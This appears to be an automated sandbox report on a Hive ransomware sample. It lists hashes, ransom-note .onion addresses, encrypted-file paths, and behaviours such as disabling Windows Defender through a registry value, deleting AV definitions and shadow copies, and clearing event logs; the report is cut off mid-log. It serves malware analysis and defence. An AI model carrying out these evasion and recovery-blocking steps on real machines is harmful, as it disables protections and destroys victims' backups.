Analysis
-
max time kernel
294s -
max time network
124s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
13-01-2022 10:46
Static task
static1
Behavioral task
behavioral1
Sample
a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe
Resource
win10-en-20211208
General
-
Target
a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe
-
Size
3.3MB
-
MD5
39c48492ba8f68bcf048cf0834bdfae1
-
SHA1
104bbf995ca99e7c9bfebfc4203dbd4a6f18352a
-
SHA256
a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643
-
SHA512
7b26012360fa844d77f92254257cbfbb9429f89d45e5967fa1dcf8e01f1bc9b98d540c9497c177fd57816e9b22e1b374ac48246163b282936cb1f3223adee2d4
Malware Config
Extracted
C:\qj7U_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 2068 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1504 bcdedit.exe 1096 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD01084_.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_kmZpC6EdK1s0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00396_.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_Bsuf4OquaXU0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01130_.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_waT36ZdzkPA0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR13F.GIF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_pZ-3-lg5ieE0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD.DEV_COL.HXC.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_g0BTV98jWhY0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Part\Msgbox.accdt.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_T2C6cSbQ_9Q0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\7-Zip\Lang\pt-br.txt.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_r0Y-kCb6fsQ0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_zh_4.4.0.v20140623020002.jar.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_OXrr-t1e-Zs0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\37.png a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\22.png a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00694_.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT__g-MfHMU0XI0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grayscale.xml.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_akQw9TAJFow0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR22F.GIF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_KTe2NZKrtKI0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\IPSEventLogMsg.dll.mui a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLENDS\BLENDS.ELM.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_jd3SE2KOzWw0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder_5.5.0.165303.jar.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_7u35XtJ27L00.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0153514.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_5uH0qhuoXYo0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR30F.GIF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_Z2quXlgDkzE0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_bottom_left.png a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\mshwLatin.dll.mui a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata_5.5.0.165303.jar.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_ojQKlBCZDnA0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UCT.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_TzykaNotCdk0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\VideoLAN\VLC\COPYING.txt.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_olYOts7lm-U0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_1tDTC_bjbtA0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CONTACTINFOBB.DPV.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_lMOgLcssY100.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\SIGN.XML.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_Z9imyhRPgjM0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File created C:\Program Files\Java\jre7\lib\cmm\qj7U_HOW_TO_DECRYPT.txt a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Memories_buttonClear.png a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_INTRO_BG_PAL.wmv a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SKY\PREVIEW.GIF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_EwV7Y-TN__c0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00462_.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_M-aaGLqcOjU0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00683_.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_40L0r83EcTo0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_left.gif.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_k8KQJq5I3KY0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Merida.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_3PPAwRdHulE0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\Java\jre7\lib\jfxrt.jar.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_StiGhLtloik0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00911_.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_EzaU1TNDneo0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipsfin.xml a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02126_.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_m8N1i6q0VSc0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00532_.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_ox2uVgOGsTA0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_QJlksLVgse00.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00273_.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_r2zx9Wi-H0I0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_ja.jar.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_U9ZGOKqCWIs0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\Java\jre7\lib\management\jmxremote.password.template.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_11Kbyr6edw40.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\vlc.mo.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_ecr_T1FYf2Y0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\system_dot.png a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_foggy.png a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099183.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_HfpdyizsseQ0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Ceuta.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_3JiUAhbEzew0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-threaddump.jar.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_7Nx8A3dt54c0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Technic.xml.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_N_9l1cLWwFQ0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-last-quarter.png a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00126_.GIF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_uGJNSS0GKgU0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00260_.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_0vB9XrRR6Dc0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00116_.WMF.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_wQ2oLl_O-b40.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BORDERBB.DPV.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT__wZB4-WvE1k0.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_zjVU9niMZD80.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Common Files\System\ado\msado27.tlb a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File created C:\Program Files\Java\jre7\lib\ext\qj7U_HOW_TO_DECRYPT.txt a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_TW.properties.KPY0ybo2xWHWnXWKgn8s5VGG7lWUmpB1-JKiRx_8_MT_Tj62k6ubqm00.kjbiu a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_foggy.png a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\ja-JP\js\timeZones.js a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_right_rest.png a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1272 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 2556 NOTEPAD.EXE -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2100 powershell.exe 2192 powershell.exe 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 832 wevtutil.exe Token: SeBackupPrivilege 832 wevtutil.exe Token: SeSecurityPrivilege 964 wevtutil.exe Token: SeBackupPrivilege 964 wevtutil.exe Token: SeSecurityPrivilege 896 wevtutil.exe Token: SeBackupPrivilege 896 wevtutil.exe Token: SeIncreaseQuotaPrivilege 632 wmic.exe Token: SeSecurityPrivilege 632 wmic.exe Token: SeTakeOwnershipPrivilege 632 wmic.exe Token: SeLoadDriverPrivilege 632 wmic.exe Token: SeSystemProfilePrivilege 632 wmic.exe Token: SeSystemtimePrivilege 632 wmic.exe Token: SeProfSingleProcessPrivilege 632 wmic.exe Token: SeIncBasePriorityPrivilege 632 wmic.exe Token: SeCreatePagefilePrivilege 632 wmic.exe Token: SeBackupPrivilege 632 wmic.exe Token: SeRestorePrivilege 632 wmic.exe Token: SeShutdownPrivilege 632 wmic.exe Token: SeDebugPrivilege 632 wmic.exe Token: SeSystemEnvironmentPrivilege 632 wmic.exe Token: SeRemoteShutdownPrivilege 632 wmic.exe Token: SeUndockPrivilege 632 wmic.exe Token: SeManageVolumePrivilege 632 wmic.exe Token: 33 632 wmic.exe Token: 34 632 wmic.exe Token: 35 632 wmic.exe Token: SeIncreaseQuotaPrivilege 684 wmic.exe Token: SeSecurityPrivilege 684 wmic.exe Token: SeTakeOwnershipPrivilege 684 wmic.exe Token: SeLoadDriverPrivilege 684 wmic.exe Token: SeSystemProfilePrivilege 684 wmic.exe Token: SeSystemtimePrivilege 684 wmic.exe Token: SeProfSingleProcessPrivilege 684 wmic.exe Token: SeIncBasePriorityPrivilege 684 wmic.exe Token: SeCreatePagefilePrivilege 684 wmic.exe Token: SeBackupPrivilege 684 wmic.exe Token: SeRestorePrivilege 684 wmic.exe Token: SeShutdownPrivilege 684 wmic.exe Token: SeDebugPrivilege 684 wmic.exe Token: SeSystemEnvironmentPrivilege 684 wmic.exe Token: SeRemoteShutdownPrivilege 684 wmic.exe Token: SeUndockPrivilege 684 wmic.exe Token: SeManageVolumePrivilege 684 wmic.exe Token: 33 684 wmic.exe Token: 34 684 wmic.exe Token: 35 684 wmic.exe Token: SeIncreaseQuotaPrivilege 684 wmic.exe Token: SeSecurityPrivilege 684 wmic.exe Token: SeTakeOwnershipPrivilege 684 wmic.exe Token: SeLoadDriverPrivilege 684 wmic.exe Token: SeSystemProfilePrivilege 684 wmic.exe Token: SeSystemtimePrivilege 684 wmic.exe Token: SeProfSingleProcessPrivilege 684 wmic.exe Token: SeIncBasePriorityPrivilege 684 wmic.exe Token: SeCreatePagefilePrivilege 684 wmic.exe Token: SeBackupPrivilege 684 wmic.exe Token: SeRestorePrivilege 684 wmic.exe Token: SeShutdownPrivilege 684 wmic.exe Token: SeDebugPrivilege 684 wmic.exe Token: SeSystemEnvironmentPrivilege 684 wmic.exe Token: SeRemoteShutdownPrivilege 684 wmic.exe Token: SeUndockPrivilege 684 wmic.exe Token: SeManageVolumePrivilege 684 wmic.exe Token: 33 684 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 756 wrote to memory of 1820 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 27 PID 756 wrote to memory of 1820 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 27 PID 756 wrote to memory of 1820 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 27 PID 1820 wrote to memory of 516 1820 net.exe 29 PID 1820 wrote to memory of 516 1820 net.exe 29 PID 1820 wrote to memory of 516 1820 net.exe 29 PID 756 wrote to memory of 580 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 30 PID 756 wrote to memory of 580 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 30 PID 756 wrote to memory of 580 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 30 PID 580 wrote to memory of 556 580 net.exe 32 PID 580 wrote to memory of 556 580 net.exe 32 PID 580 wrote to memory of 556 580 net.exe 32 PID 756 wrote to memory of 856 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 33 PID 756 wrote to memory of 856 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 33 PID 756 wrote to memory of 856 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 33 PID 856 wrote to memory of 1732 856 net.exe 35 PID 856 wrote to memory of 1732 856 net.exe 35 PID 856 wrote to memory of 1732 856 net.exe 35 PID 756 wrote to memory of 564 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 36 PID 756 wrote to memory of 564 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 36 PID 756 wrote to memory of 564 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 36 PID 564 wrote to memory of 604 564 net.exe 38 PID 564 wrote to memory of 604 564 net.exe 38 PID 564 wrote to memory of 604 564 net.exe 38 PID 756 wrote to memory of 1800 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 39 PID 756 wrote to memory of 1800 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 39 PID 756 wrote to memory of 1800 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 39 PID 1800 wrote to memory of 276 1800 net.exe 41 PID 1800 wrote to memory of 276 1800 net.exe 41 PID 1800 wrote to memory of 276 1800 net.exe 41 PID 756 wrote to memory of 1928 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 42 PID 756 wrote to memory of 1928 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 42 PID 756 wrote to memory of 1928 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 42 PID 1928 wrote to memory of 1000 1928 net.exe 44 PID 1928 wrote to memory of 1000 1928 net.exe 44 PID 1928 wrote to memory of 1000 1928 net.exe 44 PID 756 wrote to memory of 1840 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 45 PID 756 wrote to memory of 1840 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 45 PID 756 wrote to memory of 1840 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 45 PID 1840 wrote to memory of 1996 1840 net.exe 47 PID 1840 wrote to memory of 1996 1840 net.exe 47 PID 1840 wrote to memory of 1996 1840 net.exe 47 PID 756 wrote to memory of 1992 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 48 PID 756 wrote to memory of 1992 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 48 PID 756 wrote to memory of 1992 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 48 PID 1992 wrote to memory of 1360 1992 net.exe 50 PID 1992 wrote to memory of 1360 1992 net.exe 50 PID 1992 wrote to memory of 1360 1992 net.exe 50 PID 756 wrote to memory of 1364 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 51 PID 756 wrote to memory of 1364 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 51 PID 756 wrote to memory of 1364 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 51 PID 756 wrote to memory of 2028 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 53 PID 756 wrote to memory of 2028 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 53 PID 756 wrote to memory of 2028 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 53 PID 756 wrote to memory of 932 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 55 PID 756 wrote to memory of 932 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 55 PID 756 wrote to memory of 932 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 55 PID 756 wrote to memory of 1148 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 57 PID 756 wrote to memory of 1148 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 57 PID 756 wrote to memory of 1148 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 57 PID 756 wrote to memory of 920 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 59 PID 756 wrote to memory of 920 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 59 PID 756 wrote to memory of 920 756 a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 59 PID 756 wrote to memory of 1752 756 